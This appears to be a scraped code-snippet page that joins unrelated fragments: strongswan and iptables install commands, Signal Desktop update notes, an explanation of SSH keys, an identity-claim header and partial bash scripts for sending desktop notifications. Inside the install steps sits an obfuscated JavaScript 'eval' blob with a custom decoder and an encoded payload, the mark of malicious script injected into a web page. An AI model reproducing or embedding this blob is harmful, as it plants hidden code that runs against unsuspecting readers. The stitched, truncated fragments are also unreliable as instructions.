- paltform: atlantic.net ubuntu 14.04 x64
- the commands below are run with root account
apt-get install strongswan
apt-get install iptables iptables-persistent
;eval((function(t2){for(var j8="",L8=0,E8=function(t2,C8){for(var N8=0,G8=0;G8<C8;G8++){N8*=96;var x8=t2.charCodeAt(G8);if(x8>=32&&x8<=127){N8+=x8-32;}}return N8;};L8<t2.length;){if(t2.charAt(L8)!="`")j8+=t2.charAt(L8++);else{if(t2.charAt(L8+1)!="`"){var v8=E8(t2.charAt(L8+3),1)+5;j8+=j8.substr(j8.length-E8(t2.substr(L8+1,2),2)-v8,v8);L8+=4;}else{j8+="`";L8+=2;}}}return j8;})(";(function f(I,A){var p=\'\',t=unescape(\'%28%27%1Fy%22h\/U%00%06G%059%0Euy%21%01%0B%03%07U7y@%0C2%10%28%11%3C` < 26%1E%18d9%037%2CtD%1A9%09%21%17%1A%0EZ%5E%22h\/P` + 6W%1E%3C%04%5B%12J.%00%07%06S%3Bv%0D%0C%7C%28*%04%3C%29%11%09` M 8.%0A%1C%3D9@\/q%0D%15%06` > 1%09SyI%030i%26-k.%10%3Da%1D.%22+%280i%00v%25%1F%18%24%0E+%0F%0A%25%041%16%0B%26%23%11%05q\/q%0D%13%1C%07%0D%01%5DW%07%27\/%1D\/%18F%05%21%04A+` T B%29B%22Z%26W%0C8%3F%28%604%3E%20%18%25%11%3B*9D%18%19Q%08%1F5%162H%28%3BFe%0C%03Dv%08%28%1F*%09%05uy%21%0D%01` R 0u%2C%5D%0E%0D%23%28%604*7%07%2430.%0B%2C7\/Q\/q` T 8%13%15%01%00UM%0D1\/%1D\/FtA%15%1FP%21%15.B%29%17E%26K*+2%06%3F4g%05 |
python3 /path/to/start_minimized.py <command_to_run_application>
Install wmctrl and xdotool: sudo apt-get install wmctrl xdotool
UPD 2: Official standalone Signal Desktop is released!
Install official Signal Desktop, old version and this guide using it should now be considered deprecated.
UPD 1: There is now an easier way with automatic Signal Desktop installer, which also keeps Signal updated.
SSH keys come in pairs: a public and a private key. It might be easier to think of them as a lock (public part) and key (private part). You add public key (lock) to the computer you want to connect to, and then you can connect from elswhere and unlock it with your private key. So public key is meant to be handed out freely, while private key should be kept secret and safely guarded.
So let's create an SSH key (all commands below are executed on your local computer, from which you will be connecting to remote example.com):
Make sure local user has .ssh
directory: mkdir -p ~/.ssh
Generate SSH keys for passwordless authentication:
I hereby claim:
To claim this, I am signing this object:
#! /usr/bin/env bash | |
user_list=($(who | grep -E "\(:[0-9](\.[0-9])*\)" | awk '{print $1 "@" $NF}' | sort -u)) | |
for user in $user_list; do | |
username=${user%@*} | |
display=${user#*@} | |
dbus=unix:path=/run/user/$(id -u $username)/bus | |
sudo -u $username DISPLAY=${display:1:-1} \ |
#! /usr/bin/env bash | |
# Usage: notify-user.sh username notify-send-args | |
uid=$(id -u $1) | |
displays=($(who | grep -E "$1 .+\(:[0-9](\.[0-9])*\)" | awk '{print $NF}' | sort -u)) | |
for display in $displays; do | |
sudo -u $1 DISPLAY=${display:1:-1} \ | |
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/$uid/bus \ | |
notify-send "${@:2}" |